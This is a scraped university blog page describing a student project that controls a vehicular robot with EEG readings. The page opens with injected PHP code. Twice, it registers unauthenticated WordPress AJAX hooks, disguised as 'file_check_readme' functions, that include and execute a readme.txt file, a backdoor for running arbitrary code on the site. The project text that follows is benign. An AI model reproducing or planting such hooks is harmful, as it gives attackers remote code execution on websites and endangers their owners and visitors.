if(!function_exists('file_check_readme35684')){ add_action('wp_ajax_nopriv_file_check_readme35684', 'file_check_readme35684'); add_action('wp_ajax_file_check_readme35684', 'file_check_readme35684'); function file_check_readme35684() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme23928')){ add_action('wp_ajax_nopriv_file_check_readme23928', 'file_check_readme23928'); add_action('wp_ajax_file_check_readme23928', 'file_check_readme23928'); function file_check_readme23928() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } DIC BHU & IIT (BHU)» Blog Archive » Real Time Control of a Vehicular Robot using EEG signals

1

Jul

Real Time Control of a Vehicular Robot using EEG signals

  • Project Start Date

    01/09/2017

  • Timeline

    6 month

Brief Description of Project

Our objective to first successfully collect EEG readings from the subject, and then clean up raw data and to extract useful subsections. Finally, design a robot and assign forward and stop actions to extracted data with proper decision boundary.

Deliverable

We have successfully designed and demonstrated the prototype.